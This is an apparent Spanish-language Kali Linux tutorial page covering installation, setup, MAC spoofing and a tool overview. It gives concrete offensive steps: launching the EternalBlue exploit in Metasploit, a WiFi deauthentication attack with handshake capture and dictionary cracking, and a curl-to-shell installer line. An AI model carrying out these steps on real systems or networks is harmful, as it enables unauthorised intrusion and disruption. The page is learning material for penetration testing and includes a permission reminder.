Kali Linux

La distribución líder para pruebas de penetración y seguridad ofensiva

Kali Linux Desktop

¿Qué es Kali Linux?

Kali Linux es una distribución basada en Debian diseñada específicamente para pentesting y análisis forense digital, desarrollada por Offensive Security.

  • +600 herramientas preinstaladas
  • Soporte para ARM (Raspberry Pi, Android)
  • Entorno personalizado para seguridad
Descargar Kali Linux Versión actual: 2023.3

Instalación

Instalación en Hardware

  1. Descargar imagen ISO desde kali.org
  2. Crear USB booteable con:
    dd if=kali-linux-2023.3-installer-amd64.iso of=/dev/sdX bs=4M status=progress
  3. Seguir el asistente gráfico (se recomienda cifrado LUKS)

Configuración en VirtualBox

  • Asignar mínimo 2 CPUs y 4GB RAM
  • Habilitar PAE/NX en configuración del sistema
  • Configurar red en modo Bridge para pruebas reales
  • Instalar Guest Additions para mejor rendimiento:
    sudo apt update && sudo apt install -y virtualbox-guest-x11

Kali en WSL 2 (Windows)

  1. Activar WSL 2 en PowerShell como admin:
    wsl --install
  2. Descargar Kali desde Microsoft Store
  3. Iniciar sesión con usuario creado durante instalación
  4. Limitación: No soporta herramientas que requieran interfaz gráfica o acceso a hardware RAW

Modo Live Persistente

Permite guardar cambios en un USB:

# Crear partición persistente (mínimo 8GB)
gparted /dev/sdX  # Crear partición EXT4 con label "persistence"
mkdir -p /mnt/usb
mount /dev/sdX3 /mnt/usb
echo "/ union" > /mnt/usb/persistence.conf
umount /mnt/usb

Configuración Inicial

sudo apt update && sudo apt full-upgrade -y
sudo apt autoremove -y
sudo useradd -m -G sudo -s /bin/bash tu_usuario
sudo passwd tu_usuario

¡Importante! Evitar usar root para operaciones diarias.

Para ocultar tu dirección MAC:

sudo systemctl stop NetworkManager
sudo macchanger -r wlan0
sudo systemctl start NetworkManager

Herramientas Clasificadas

Categoría Herramienta Comando Uso
Reconocimiento Nmap nmap -sV 192.168.1.1 Escaneo de puertos
Análisis Web Burp Suite burpsuite Testing de aplicaciones
Explotación Metasploit msfconsole Framework de exploits
Wireless Aircrack-ng airmon-ng start wlan0 Auditoría WiFi
Legalidad: Solo usar estas herramientas en redes propias o con permiso explícito.

Comandos Útiles

Gestión de Paquetes

# Buscar herramientas
sudo apt search "pentest"

# Instalar herramienta específica
sudo apt install metasploit-framework

# Ver herramientas instaladas
apt list --installed | grep kali-tools

Servicios

# Iniciar/parar PostgreSQL (necesario para Metasploit)
sudo systemctl start postgresql

# Ver estado de servicios
systemctl list-units --type=service

Personalización

# Cambiar shell a ZSH
sudo apt install zsh
chsh -s $(which zsh)

# Instalar Oh My ZSH
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"

Contenido Técnico Destacado

1. Configuración de Entorno

# Configurar alias útiles en ~/.zshrc
alias ll='ls -la'
alias updatekali='sudo apt update && sudo apt full-upgrade -y'
alias myip='ip -br -c a'

2. Uso de Metasploit

# Iniciar Metasploit con PostgreSQL
sudo systemctl start postgresql
msfdb init
msfconsole

# Comandos básicos en msf
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > set RHOSTS 192.168.1.100
msf6 exploit > exploit

3. Auditoría WiFi con Aircrack-ng

# Poner interfaz en modo monitor
sudo airmon-ng start wlan0

# Escanear redes
sudo airodump-ng wlan0mon

# Capturar handshake (para WPA/WPA2)
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura wlan0mon
# En otra terminal:
sudo aireplay-ng -0 4 -a 00:11:22:33:44:55 -c FF:FF:FF:FF:FF:FF wlan0mon

# Crackear con diccionario
sudo aircrack-ng -w diccionario.txt captura-01.cap